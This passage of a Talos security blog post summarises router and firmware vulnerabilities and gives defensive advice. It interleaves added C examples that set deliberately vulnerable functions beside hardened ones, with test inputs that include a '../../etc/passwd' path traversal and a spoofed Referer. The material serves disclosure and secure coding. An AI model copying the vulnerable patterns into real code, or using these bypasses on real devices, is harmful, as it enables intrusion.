* **TALOS-2020-1065**: This report describes a vulnerability in Qualcomm's `lbd`, a service reachable via LAN on ports 7786 and 7787, which can be used without authentication to directly execute shell commands as root, whenever an attacker is on the same LAN as the router. Since this is reachable via LAN, it is also reachable via the VPN. By chaining this vulnerability with the two above, it was possible to execute arbitrary commands as root via the VPN, without prior authentication, on any selected router connected to QuickConnect.
### Observations
Synology SRM provides a convenient VPN service to solve the remote management issue for SOHO routers running on a dynamic IP address. However, this research has shown that such services can also widen the attack surface. Devices exposed via DDNS normally take more effort to be discovered, usually requiring an internet-wide scan. With QuickConnect, however, all devices are easily discovered as they're all connected to the same VPN, which is publicly accessible and whose geo-located services are easily enumerable.
## **TCL Linkhub Mesh Wifi**
Research conducted by Carl Hurd.
### Background
The TCL Linkhub is one of the newest products sold by TCL and the feature set and price tag could mean a very rapid adoption rate, much like the budget TV market. Over the course of the research, Talos submitted 17 unique reports to TCL, resulting in 42 CVEs. The research on the TCL Linkhub Mesh Wi-Fi system was primarily focused on the API service that is used for all management of the device. The Linkhub does not use a web server to serve a user interface, instead, all interaction with the device is done through a phone application. This phone application interacts with the device through a ProtoBuffer-based API. This service is one of the few ports open by default and thus was the most interesting target for this research.
### Notable Vulnerabilities
* **TALOS-2022-1463**: This vulnerability existed in the code for getting and setting values in the flash storage of the LinkHub. This vulnerability is interesting because it was not contained in a specific library and was used in almost every binary on the device. While getting values from flash, the function did not take into account the length of the destination buffer. An attacker could easily change a configuration value to a large value, and the next time that variable was loaded from flash, it would cause a buffer overflow. This vulnerability would lead to arbitrary code execution.
* **TALOS-2022-1455**: This vulnerability existed in the API service that is exposed for use with the phone application. ProtoBuffer serialization is used for all communication with the device from the management application. Once the buffer is deserialized, it is dispatched to various handlers across the device. Within the `set_mf_rule` functionality, a `memcpy` occurs that determines length based on user input directly. Attackers could use this functionality to send a `mf_rule` message that contains fields larger than the statically sized buffers in the device. This vulnerability would lead to a buffer overflow and arbitrary code execution.
* **TALOS-2022-1458**: This vulnerability existed in the API service that is exposed for use with the phone application. ProtoBuffer serialization is used for all communication with the device from the management application. Once the buffer is deserialized, it's dispatched to various handlers across the device. Within the `ucloud_add_node` functionality, which is used to add satellites to the router mesh, a `MxpManageList` message is parsed directly into the `system` function. An attacker could use a malicious message to execute arbitrary commands using this vulnerability.
### Observations
The TCL LinkHub has a unique approach to management, which changes the attack surface significantly. Choosing to utilize Protobuffers for serialization is a good decision on the developer's part, as it is a well-tested and maintained library, but once the data is unserialized, much of the input is blindly trusted since it is assumed to come from the management application. All of this data should be treated as user data and more validation should occur once deserialization occurs, prior to use in potentially dangerous functions, such as `memcpy`.
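The observation above is the core lesson of TALOS-2022-1455: a decoded protobuf field carries whatever length the sender declared. The following C is an added example, not TCL's or Talos' code; the `mf_rule` message and `set_mf_rule` handler names come from the advisory, while the field layout (`mac`, `name`), the record sizes and the `pb_bytes` stand-in for a decoded bytes field are assumptions made for the demonstration.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* A field as it leaves the protobuf decoder: raw bytes plus the length
 * the *sender* declared.  Field names here are hypothetical. */
struct pb_bytes {
    const uint8_t *data;
    size_t len;
};

struct mf_rule_msg {        /* hypothetical decoded "mf_rule" message */
    struct pb_bytes mac;    /* should be exactly 6 raw bytes */
    struct pb_bytes name;   /* should be a short printable label */
};

/* Device-side record with fixed-size storage, as firmware tends to use. */
struct mf_rule {
    uint8_t mac[6];
    char    name[32];
};

/* Vulnerable shape (constructed to mirror the advisory): the copy length
 * is taken straight from the decoded message, so fields longer than the
 * fixed-size members overrun the record.  Shown for contrast; never
 * invoked below. */
void set_mf_rule_unsafe(struct mf_rule *dst, const struct mf_rule_msg *m)
{
    memcpy(dst->mac, m->mac.data, m->mac.len);      /* sender-chosen length */
    memcpy(dst->name, m->name.data, m->name.len);   /* sender-chosen length */
    dst->name[m->name.len] = '\0';
}

/* Hardened shape: each field is checked against both the storage it is
 * copied into and the format it is supposed to have, before any copy.
 * Returns 0 on success, -1 when the message is rejected. */
static int set_mf_rule_checked(struct mf_rule *dst, const struct mf_rule_msg *m)
{
    if (m->mac.data == NULL || m->mac.len != sizeof dst->mac)
        return -1;                                  /* a MAC is exactly 6 bytes */
    if (m->name.data == NULL || m->name.len == 0 ||
        m->name.len >= sizeof dst->name)            /* keep room for the NUL */
        return -1;
    for (size_t i = 0; i < m->name.len; i++) {
        uint8_t c = m->name.data[i];
        if (c < 0x20 || c > 0x7e)                   /* printable ASCII only */
            return -1;
    }
    memcpy(dst->mac, m->mac.data, sizeof dst->mac);
    memcpy(dst->name, m->name.data, m->name.len);
    dst->name[m->name.len] = '\0';
    return 0;
}

/* Scaffold for exercising the checked setter: builds a message whose two
 * fields point into a constructed buffer with the requested lengths and
 * returns the setter's verdict (0 = accepted, -1 = rejected). */
static int rule_result(size_t maclen, size_t namelen, int printable)
{
    uint8_t buf[64];
    struct mf_rule r;
    memset(buf, printable ? 'A' : 0x01, sizeof buf);
    struct mf_rule_msg m = { { buf, maclen }, { buf, namelen } };
    return set_mf_rule_checked(&r, &m);
}

int main(void)
{
    printf("well-formed:   %d\n", rule_result(6, 5, 1));    /* 0 */
    printf("40-byte name:  %d\n", rule_result(6, 40, 1));   /* -1 */
    printf("5-byte mac:    %d\n", rule_result(5, 5, 1));    /* -1 */
    printf("control chars: %d\n", rule_result(6, 5, 0));    /* -1 */
    return 0;
}
```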
## **TP-Link TL-R600VPN**
Research conducted by Jared Rittle and Carl Hurd.
### Background
The TP-Link TL-R600VPN became a subject of our research for its direct involvement in the VPNFilter campaign. The TP-Link TL-R600VPN is a five-port SOHO router. This device contains a Realtek RTL8198 integrated system on a chip. This particular chip uses an offshoot of the MIPS-1 architecture developed by Lexra. This device is a fairly run-of-the-mill small router and contains network diagnostic capabilities and basic router functionality that is managed by a web server on the device. This research led to four Talos reports to TP-Link, resulting in four CVEs. For a more in-depth look at the research done on this device, refer to the corresponding [blog post](<https://blog.talosintelligence.com/vulnerability-deep-dive-tp-link/>).
### Notable Vulnerabilities
* **TALOS-2018-0620**: This vulnerability existed in the header parsing of HTTP requests within the web server. This vulnerability was triggered by sending a request to a specific subset of pages on the web server. Once the request was made, a statically sized buffer is used for the parsed headers. An attacker could use an abnormally long header entry to overflow the buffer and overwrite the return address. This vulnerability leads to arbitrary code execution.
* **TALOS-2018-0619**: This vulnerability existed in the network debugging functionality of the device. The ping functionality of the R600-VPN contained a parameter that was unchecked by user input. An attacker could supply an abnormally long ping_addr parameter to overflow the statically sized buffer used to hold the value, in turn overwriting the return address. This vulnerability leads to arbitrary code execution.
* **TALOS-2018-0618**: This vulnerability was contained within the HTTP server within the R600-VPN. The user-provided URL was parsed without regard for special characters such as "../" to navigate up a directory tree. Normally, special characters like this are removed or ignored in a URL and the directory navigation does not occur, but in the R600-VPN this navigation could be used to retrieve any files on the device. This vulnerability leads to sensitive information disclosure.
### Observations
Most of the findings on the TL-R600VPN centered around the web server and the functionality provided by it. One of the simplest solutions to reduce risk is to integrate a well-tested web server instead of developing one from scratch or including untested code in the product. While some of the vulnerable code was within the web server itself, much of it was also added by the manufacturer for simple additional features, like network diagnostics. It is clear from this research that any added code needs to be reviewed to prevent these issues.
## **ZTE MF971R**
Research conducted by Marcin Noga.
### Background
The ZTE MF971R mobile router is one of the newest devices in the ZTE MF mobile router family. At least in Poland, it is a very popular device; its popularity stems from the fact that it is sold by, among others, major GSM providers, or even bundled as a gift with some of their products and services. Over the course of the research, Talos submitted seven reports to ZTE, resulting in seven CVEs. The research on the ZTE MF971R router was primarily focused on the web application/server that is used for all management of the device. We managed to find a set of vulnerabilities in the Web APIs which, chained together, allowed us to create a one-click exploit giving us full remote access to the device. See our [deep dive whitepaper](<https://talosintelligence.com/resources/407>) for a more in-depth explanation.
### Notable Vulnerabilities
* **TALOS-2021-1317**: This vulnerability is related to the implementation of CSRF protection/API restriction communication in Web APIs. To communicate with a certain set of Web APIs, a request should be sent from a 127.0.0.1 address or default router IP address -- 192.168.0.1. It's verified by checking the HTTP Referer value. Unfortunately, the way the check was implemented gives an attacker the possibility to bypass it by simply adding string 127.0.0.1 in any part of a referrer URL and obtaining full access to API communication.
* **TALOS-2021-1320**: Talos discovered this vulnerability within the implementation of the ADB_MODE_SWITCH Web API. A password parameter being a part of this API is not properly sanitized in the context of its length which leads to a stack-based buffer overflow. The victim does not need to be logged in to be affected by this vulnerability. The only constraint an attacker needs to pass is a referrer check, which is easy to bypass and has been described in TALOS-2021-1317. This remote pre-auth stack-based buffer overflow gives an attacker full control when overwriting the return address and as we demonstrated can be turned into one-click remote code execution.
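The Referer check in TALOS-2021-1317 fails because a substring match accepts the trusted address anywhere in the URL. The C below is an added example, not ZTE's code: it puts that weak shape beside a check that isolates the host component of the Referer and compares it whole against the two addresses the advisory names. The sample referers are constructed.

```c
#include <stdio.h>
#include <string.h>

/* Addresses the management UI is expected to be loaded from (from the
 * advisory); the Referer's host must match one of these exactly. */
static const char *const ALLOWED_HOSTS[] = { "127.0.0.1", "192.168.0.1" };

/* Weak check, constructed to mirror the advisory: the trusted address only
 * has to appear somewhere in the Referer, so a referer such as
 * "http://attacker.example/127.0.0.1" is accepted.  Kept for contrast. */
int referer_ok_weak(const char *referer)
{
    if (referer == NULL)
        return 0;
    for (size_t i = 0; i < sizeof ALLOWED_HOSTS / sizeof ALLOWED_HOSTS[0]; i++)
        if (strstr(referer, ALLOWED_HOSTS[i]) != NULL)
            return 1;
    return 0;
}

/* Hardened check: require an http(s) URL, isolate the host component and
 * compare it whole against the allowlist.  Userinfo ('@'), ports, paths and
 * query strings cannot smuggle an allowlisted string past the comparison. */
static int referer_ok_strict(const char *referer)
{
    const char *host;
    size_t n;

    if (referer == NULL)
        return 0;
    if (strncmp(referer, "http://", 7) == 0)
        host = referer + 7;
    else if (strncmp(referer, "https://", 8) == 0)
        host = referer + 8;
    else
        return 0;

    /* The host ends at the first '/', ':' (port), '?' or '#'. */
    n = strcspn(host, "/:?#");
    if (n == 0 || memchr(host, '@', n) != NULL)   /* empty host or userinfo */
        return 0;

    for (size_t i = 0; i < sizeof ALLOWED_HOSTS / sizeof ALLOWED_HOSTS[0]; i++)
        if (strlen(ALLOWED_HOSTS[i]) == n && memcmp(host, ALLOWED_HOSTS[i], n) == 0)
            return 1;
    return 0;
}

int main(void)
{
    const char *samples[] = {                     /* constructed inputs */
        "http://192.168.0.1/goform/status",
        "http://attacker.example/127.0.0.1",
        "http://127.0.0.1.attacker.example/",
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-40s weak=%d strict=%d\n", samples[i],
               referer_ok_weak(samples[i]), referer_ok_strict(samples[i]));
    return 0;
}
```

Even when implemented correctly, a Referer check is a coarse CSRF control, since browsers may omit the header; a per-session anti-CSRF token is the stronger mechanism.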
### Observations
The ZTE MF971R's security suffered for several reasons. Despite visible efforts to reduce access to certain WebAPIs, it was still possible to bypass this mechanism, thus increasing the number of attack vectors. The main web server binary lacked compatibility with basic mitigations such as ASLR (Address Space Layout Randomization) and stack cookies, making the exploitation of existing vulnerabilities trivial. Improving security mechanisms in the aforementioned areas will reduce the number of attack vectors and make exploiting existing vulnerabilities, especially those without any authorization, more difficult or practically impossible.
# Common frameworks
The previous section talked about the specific routers that we investigated. However, some of these routers also ran specific software that is common for many routers: open-source firmware such as OpenWrt, FreshTomato, AsusWRT or DD-WRT. One router also ran a specific kernel module called KCodes. As this software isn't specific to the vendors we discussed in the router sections, we're grouping the vulnerabilities we found together.
## **OpenWrt**
Research conducted by Claudio Bozzato.
### Background
OpenWrt is a Linux-based OS, primarily used on embedded devices to route network traffic. It's highly customizable and ships with a set of tools and libraries that have been optimized to run on hardware with limited resources. Due to this, OpenWrt is a common choice among SOHO routers.
### Notable Vulnerabilities
* **TALOS-2019-0893**: This vulnerability affected the ustream-ssl library, a library that works as an SSL wrapper for OpenSSL, mbed TLS and wolfSSL. This issue describes how the library does not terminate the SSL connection immediately when a wrong certificate is supplied by an HTTPS server, allowing the client to send one request using any unverified certificate, before terminating the connection. As OpenWrt uses this library for tools like `wget`, any functionality relying on it would be affected by this information leak when requesting any HTTPS URL, which could allow, in the worst case, for an attacker to perform a man-in-the-middle attack and steal any sensitive information present in the request.
### Observations
Because the HTTPS connection eventually terminates with an error, this issue can easily go unnoticed. As OpenWrt is a platform that is easy to customize and write scripts for, such a vulnerability may affect a large number of users.
## **FreshTomato**
Research conducted by Francesco Benvenuto.
### Background
The FreshTomato is a popular open-source firmware project. It is an actively maintained and modern firmware project that's widely used by multiple SOHO routers. By default, it ships with several functionalities, e.g., SSH, VPN capabilities, Telnet, Routing, etc.
### Notable Vulnerabilities
* **TALOS-2022-1642**: This vulnerability existed in one of the functionalities provided by FreshTomato's HTTP server. The server provides a simple template language, and one of the templating functions reads the content of a file, named by the user, from a specific folder. Because no sanitization is performed and the file path is composed by concatenating the hard-coded path with the provided filename, this function is vulnerable to path traversal. An attacker with valid credentials could read any file in the file system.
* **TALOS-2022-1641**: This vulnerability existed in one of the log-related functions provided by FreshTomato's HTTP server. The functionality allows users to find certain strings in the log file via OS commands. Because no real sanitization is performed against the user-controlled parameter, this function is vulnerable to an OS command injection vulnerability. An attacker could leverage this vulnerability to achieve arbitrary command injection.
* **TALOS-2022-1509**: This vulnerability existed in the URL unescape functionality provided by FreshTomato's HTTP server. The unescape always assumes that there are two characters following the '%' character. However, this is not the case and opens the door to an out-of-bounds read-and-write.
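Both TALOS-2022-1642 above and TALOS-2018-0618 on the TP-Link come down to joining a user-supplied name onto a hard-coded directory without resolving "..". The C below is an added example, not FreshTomato's or TP-Link's code: it normalizes the relative path lexically, refuses any ".." that would climb above the root, and only then joins it. The root directory `/www/templates` and the helper names are assumptions for the demonstration.

```c
#include <stdio.h>
#include <string.h>

#define MAX_SEGS 32

/* Lexically normalise a '/'-separated relative path and join it under a
 * fixed root.  Empty and "." segments are dropped, ".." pops the previous
 * segment, and a ".." with nothing left to pop is an attempt to climb out of
 * the root and is rejected.  Returns 0 and fills out on success, -1 on any
 * rejection.  The input must already be URL-decoded: checking the raw
 * "%2e%2e/" form would miss the traversal. */
static int join_under_root(const char *root, const char *rel,
                           char *out, size_t outsz)
{
    const char *segs[MAX_SEGS];   /* kept segments, pointing into rel */
    size_t lens[MAX_SEGS];
    size_t n = 0, used;
    const char *p = rel;

    if (strchr(rel, '\\') != NULL)         /* no alternate separators */
        return -1;

    while (*p != '\0') {
        size_t len = strcspn(p, "/");
        if (len == 0 || (len == 1 && p[0] == '.')) {
            /* empty or "." segment: nothing to record */
        } else if (len == 2 && p[0] == '.' && p[1] == '.') {
            if (n == 0)
                return -1;                 /* would escape the root */
            n--;
        } else {
            if (n == MAX_SEGS)
                return -1;                 /* deeper than we will handle */
            segs[n] = p;
            lens[n] = len;
            n++;
        }
        p += len;
        if (*p == '/')
            p++;
    }
    if (n == 0)
        return -1;                         /* the root itself is not a file */

    used = strlen(root);
    if (used >= outsz)
        return -1;
    memcpy(out, root, used);
    for (size_t i = 0; i < n; i++) {
        if (used + 1 + lens[i] >= outsz)
            return -1;                     /* result would not fit */
        out[used++] = '/';
        memcpy(out + used, segs[i], lens[i]);
        used += lens[i];
    }
    out[used] = '\0';
    return 0;
}

#define DEMO_ROOT "/www/templates"          /* hypothetical hard-coded folder */

/* Helpers: resolve against the demo root and report the outcome. */
static int path_resolves_to(const char *rel, const char *expect)
{
    char path[256];
    return join_under_root(DEMO_ROOT, rel, path, sizeof path) == 0 &&
           strcmp(path, expect) == 0;
}

static int path_rejected(const char *rel)
{
    char path[256];
    return join_under_root(DEMO_ROOT, rel, path, sizeof path) == -1;
}

int main(void)
{
    const char *inputs[] = { "index.html", "css/../logo.png",
                             "../../etc/passwd", "a/../../etc/passwd" };
    char path[256];
    for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; i++) {
        if (join_under_root(DEMO_ROOT, inputs[i], path, sizeof path) == 0)
            printf("%-20s -> %s\n", inputs[i], path);
        else
            printf("%-20s -> rejected\n", inputs[i]);
    }
    return 0;
}
```

Lexical normalisation does not protect against a symlink inside the root pointing outside it; that needs an open-time check (for example `O_NOFOLLOW` plus `fstat`) in addition.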
### Observations
Because the FreshTomato project is the base for many routers, any vulnerability found in the software could have wide-ranging consequences. We cannot fully gauge how the firmware is deployed and how much impact these vulnerabilities will have on the deployed router.
## **Asuswrt and Asuswrt-Merlin New Gen, DD-WRT**
Research conducted by Francesco Benvenuto.
### Background
Like FreshTomato, Asuswrt, Asuswrt-Merlin New Gen and DD-WRT are the base firmware for several SOHO routers.
### Notable Vulnerabilities
* **TALOS-2022-1511**: This vulnerability existed in the URL unescape functionality provided by the Asuswrt and Asuswrt-Merlin New Gen HTTP server. The unescape routine always assumes that there are two characters following the "%" character. However, this is not the case and could lead to an out-of-bounds read and write.
* **TALOS-2022-1510**: This vulnerability is in the URL unescape functionality provided by the DD-WRT's HTTP server. The unescape always assumes that there are two characters following the "%" character, however, this assumption is incorrect and could lead to an out-of-bounds read and write.
### Observations
After our researchers discovered TALOS-2022-1509, we discovered [other software that was vulnerable to the same unescape vulnerable pattern](<https://blog.talosintelligence.com/vulnerability-spotlight-how-code-re-use/>), including TALOS-2022-1511 in Asuswrt and Asuswrt-Merlin New Gen, and TALOS-2022-1510 in DD-WRT.
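TALOS-2022-1509, TALOS-2022-1511 and TALOS-2022-1510 are the same defect in three code bases: the decoder assumes two bytes follow every "%". The C below is an added example, not code from FreshTomato, Asuswrt or DD-WRT; it places that vulnerable shape beside a decoder that verifies both hex digits exist before consuming them and rejects malformed escapes. The sample inputs are constructed.

```c
#include <stdio.h>
#include <string.h>

/* Value of a hex digit, or -1 for anything else (including the NUL). */
static int hexval(char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Vulnerable shape, constructed to mirror the three advisories: on '%'
 * the loop consumes the next two bytes unconditionally.  For an input
 * ending in "%" or "%4" that reads in[2] past the terminator and then
 * steps the cursor beyond it, so the loop keeps reading and writing past
 * the end of the buffer.  Shown for contrast; not invoked below. */
void url_unescape_unsafe(char *s)
{
    char *out = s;
    for (char *in = s; *in != '\0'; in++) {
        if (*in == '%') {
            *out++ = (char)(hexval(in[1]) * 16 + hexval(in[2]));
            in += 2;                       /* may land past the NUL */
        } else {
            *out++ = *in;
        }
    }
    *out = '\0';
}

/* Hardened shape: a '%' is decoded only when two hex digits really follow
 * it.  hexval(in[1]) is tested before in[2] is touched, so the scan never
 * looks beyond the terminator, and a malformed escape is rejected instead
 * of guessed at.  "%00" is also rejected, since an embedded NUL would
 * silently truncate the decoded string for every later consumer.
 * Decodes in place (output never outruns input); returns the decoded
 * length, or -1 on rejection. */
static int url_unescape(char *s)
{
    char *out = s;
    const char *in = s;
    while (*in != '\0') {
        if (*in == '%') {
            int hi = hexval(in[1]);
            int lo = (hi >= 0) ? hexval(in[2]) : -1;
            if (hi < 0 || lo < 0 || (hi == 0 && lo == 0))
                return -1;
            *out++ = (char)(hi * 16 + lo);
            in += 3;
        } else {
            *out++ = *in++;
        }
    }
    *out = '\0';
    return (int)(out - s);
}

/* Helpers for exercising url_unescape on a writable copy of a literal. */
static int unescape_gives(const char *in, const char *expect)
{
    char buf[128];
    strncpy(buf, in, sizeof buf - 1);
    buf[sizeof buf - 1] = '\0';
    return url_unescape(buf) >= 0 && strcmp(buf, expect) == 0;
}

static int unescape_rejects(const char *in)
{
    char buf[128];
    strncpy(buf, in, sizeof buf - 1);
    buf[sizeof buf - 1] = '\0';
    return url_unescape(buf) == -1;
}

int main(void)
{
    const char *inputs[] = { "%41%42c", "a%2Fb", "abc%4", "abc%", "%zz", "a%00b" };
    char buf[128];
    for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; i++) {
        strcpy(buf, inputs[i]);
        int n = url_unescape(buf);
        printf("%-10s -> %s\n", inputs[i], n < 0 ? "rejected" : buf);
    }
    return 0;
}
```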
## **KCodes NetUSB.ko**
Research conducted by Dave McDaniel.
### Background
Some NETGEAR routers utilize a bespoke kernel module called NetUSB.ko from a Taiwanese company called KCodes. This module is custom-made for each device but contains similar functionality. The module shares USB devices over TCP, allowing clients to use various vendor-made drivers and software to connect to these devices in such a way that the client machine treats the remote device as a local USB device plugged into their computer. The software used for NETGEAR routers is called NETGEAR USB Control Center, and it utilizes a driver called NetUSBUDSTcpBus.sys (on Windows) for communications.
### Notable Vulnerabilities
* **TALOS-2019-0775**: Once the static AES key was recovered, an attacker could easily trigger a DoS or remote information disclosure using a single opcode after the handshake.
* **TALOS-2019-0776**: Similar to TALOS-2019-0775, this vulnerability leaks memory. In this case, it leaks very useful memory such as stack boundary addresses, a pointer to a specific configuration function and, notably, the base address of the running kernel module NetUSB.ko. This could potentially be combined with other remote attacks that could leverage this data when designing a specific payload for the target.
### Observations
Many other products use NetUSB.ko. A previously disclosed vulnerability in 2015 led researchers to believe a flaw in this very kernel module potentially existed in as many as 92 products across multiple vendors. For this analysis, we utilized the R8000 hardware to test the R8000 version of NetUSB.ko (1.0.2.66) and the R7900 version (1.0.2.69) since both modules are compiled for the same kernel. Specifically, the information disclosed in TALOS-2019-0776 appears to be particularly useful for recovering sensitive memory addresses for payload generation, regardless of the architecture/operating system that uses the kernel module.
# Key observations
SOHO routers are generally valuable targets for adversaries due to their position within the network and wide adoption within common network deployments. Their relatively low cost, wide availability, ease of acquisition and user-friendly management features lead to these products being in many homes, small and home offices, warehouses, coffee shops and many other businesses. They are even deployed as gateways providing remote access to industrial environments.
Vulnerabilities in these routers can provide entry to a huge variety of targets, and the same vulnerability can be used for impact, meaning these routers are high-value targets for malicious actors.
The security posture of these lower-cost routers has improved over the last few years, but in general, security advice for these devices is the same as it has been in the past. Some of the important security tenets for manufacturers are:
* Features and services should be disabled by default unless they are critical for the operation of the device.
* WAN-side management should be deactivated by default.
* Support modern security features such as TLS/SSL encryption and make sure they're implemented properly.
* Never trust user input.
* Keep third-party code up-to-date.
* Audit or familiarize yourself with integrated code.
* Don't rely on obscure and undocumented diagnostic features or credentials.
Each of the vulnerabilities discovered falls into one of these categories. Code quality is always going to be an additional concern, and the utilization of safe functions should always be enforced during development. Ideally, use static analysis tooling during development. This may not be financially viable for many products hoping to keep consumer costs low. In this case, lean on compiler warnings and any other methods of ensuring the highest code quality possible.
Simple changes to the development process can mitigate many of the worst effects of these issues. Memory corruption, one of the most glaring vulnerabilities, can be mitigated by using memory-safe languages (i.e., Rust and Go). If safe languages are not an option, vendors should make sure to implement as many mitigations as possible, both compiler-based and OS-based. Examples of these mitigations would be non-executable stacks and address space layout randomization (ASLR).
The next most helpful change involves defining user interaction boundaries. Generic strings are notoriously difficult to parse or apply access controls to. By utilizing a well-defined API boundary, it is easier to validate user requests and input. The boundary also acts as an access control list to prevent a malicious user from executing arbitrary commands or providing input that would result in other unexpected behavior.
The most important security step a user of these devices can take is to assess each service present on the device. Verify that each service running is required for the day-to-day operation of each device, and disable all extraneous services. Services that cannot be disabled should be restricted to absolute minimal access or completely blocked using alternative methods, such as firewall rules to block traffic. During the acquisition process, if possible, basic research should be done to ensure the devices have sane, secure defaults enabled, such as the use of encrypted protocols for remote access and administration, if applicable. Start your assessment by reading the router's user manual thoroughly, even before purchase. The quality of details concerning device features in a user manual is often indicative of the overall product quality.
While the security posture of SOHO routers has generally improved, many could benefit from low-cost mitigations that would drastically improve their security posture. Over the past few years, Talos has published 141 advisories covering 289 CVEs within 13 SOHO and industrial routers and six common frameworks. Talos vulnerability research is always driven by the mandate to protect Cisco customers, but we also aim to improve the security of all devices we research. All research has been publicly disclosed, after disclosure to the vendor, according to Cisco's vulnerability disclosure policy. These disclosures directly result in vulnerability remediations that improve the security posture of anyone using these devices.
# Vulnerability List
This blog post included a summary of each router and a few select vulnerabilities. Below is a list of all the advisories Talos disclosed post-VPNFilter.
| Talos ID (Linked to Report) | CVE(s) | Product |
|---|---|---|
| [TALOS-2022-1511](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1511>) | CVE-2022-26376 | Asuswrt and Asuswrt-Merlin New Gen |
| [TALOS-2022-1592](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1592>) | CVE-2022-38393 | Asus RT-AX82U |
| [TALOS-2022-1590](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1590>) | CVE-2022-38105 | Asus RT-AX82U |
| [TALOS-2022-1586](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1586>) | CVE-2022-35401 | Asus RT-AX82U |
| [TALOS-2021-1361](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1361>) | CVE-2021-21913 | D-Link DIR3040 |
| [TALOS-2021-1285](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1285>) | CVE-2021-21820 | D-Link DIR3040 |
| [TALOS-2021-1284](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1284>) | CVE-2021-21819 | D-Link DIR3040 |
| [TALOS-2021-1283](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1283>) | CVE-2021-21818 | D-Link DIR3040 |
| [TALOS-2021-1282](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1282>) | CVE-2021-21817 | D-Link DIR3040 |
| [TALOS-2021-1281](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1281>) | CVE-2021-21816 | D-Link DIR3040 |
| [TALOS-2022-1510](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1510>) | CVE-2022-27631 | DD-WRT |
| [TALOS-2022-1642](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1642>) | CVE-2022-38451 | FreshTomato |
| [TALOS-2022-1641](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1641>) | CVE-2022-42484 | FreshTomato |
| [TALOS-2022-1509](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1509>) | CVE-2022-28664 - CVE-2022-28665 | FreshTomato |
| [TALOS-2022-1523](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1523>) | CVE-2022-25932 | InHand Networks InRouter302 |
| [TALOS-2022-1522](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1522>) | CVE-2022-29888 | InHand Networks InRouter302 |
| [TALOS-2022-1521](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1521>) | CVE-2022-28689 | InHand Networks InRouter302 |
| [TALOS-2022-1520](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1520>) | CVE-2022-26023 | InHand Networks InRouter302 |
| [TALOS-2022-1519](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1519>) | CVE-2022-30543 | InHand Networks InRouter302 |
| [TALOS-2022-1518](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1518>) | CVE-2022-29481 | InHand Networks InRouter302 |
| [TALOS-2022-1501](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1501>) | CVE-2022-26518 | InHand Networks InRouter302 |
| [TALOS-2022-1500](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1500>) | CVE-2022-26075 | InHand Networks InRouter302 |
| [TALOS-2022-1499](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1499>) | CVE-2022-26420 | InHand Networks InRouter302 |
| [TALOS-2022-1496](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1496>) | CVE-2022-27172 | InHand Networks InRouter302 |
| [TALOS-2022-1495](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1495>) | CVE-2022-26510 | InHand Networks InRouter302 |
| [TALOS-2022-1481](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1481>) | CVE-2022-26780 - CVE-2022-26782 | InHand Networks InRouter302 |
| [TALOS-2022-1478](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1478>) | CVE-2022-26042 | InHand Networks InRouter302 |
| [TALOS-2022-1477](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1477>) | CVE-2022-25995 | InHand Networks InRouter302 |
| [TALOS-2022-1476](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1476>) | CVE-2022-26002 | InHand Networks InRouter302 |
| [TALOS-2022-1475](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1475>) | CVE-2022-26007 | InHand Networks InRouter302 |
| [TALOS-2022-1474](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1474>) | CVE-2022-26020 | InHand Networks InRouter302 |
| [TALOS-2022-1473](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1473>) | CVE-2022-26085 | InHand Networks InRouter302 |
| [TALOS-2022-1472](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1472>) | CVE-2022-21182 | InHand Networks InRouter302 |
| [TALOS-2022-1471](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1471>) | CVE-2022-24910 | InHand Networks InRouter302 |
| [TALOS-2022-1470](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1470>) | CVE-2022-25172 | InHand Networks InRouter302 |
| [TALOS-2022-1469](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1469>) | CVE-2022-21238 | InHand Networks InRouter302 |
| [TALOS-2022-1468](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1468>) | CVE-2022-21809 | InHand Networks InRouter302 |
| [TALOS-2019-0776](<https://talosintelligence.com/vulnerability_reports/TALOS-2019-0776>) | CVE-2019-5017 | KCodes NetUSB.ko |
| [TALOS-2019-0775](<https://talosintelligence.com/vulnerability_reports/TALOS-2019-0775>) | CVE-2019-5016 | KCodes NetUSB.ko |
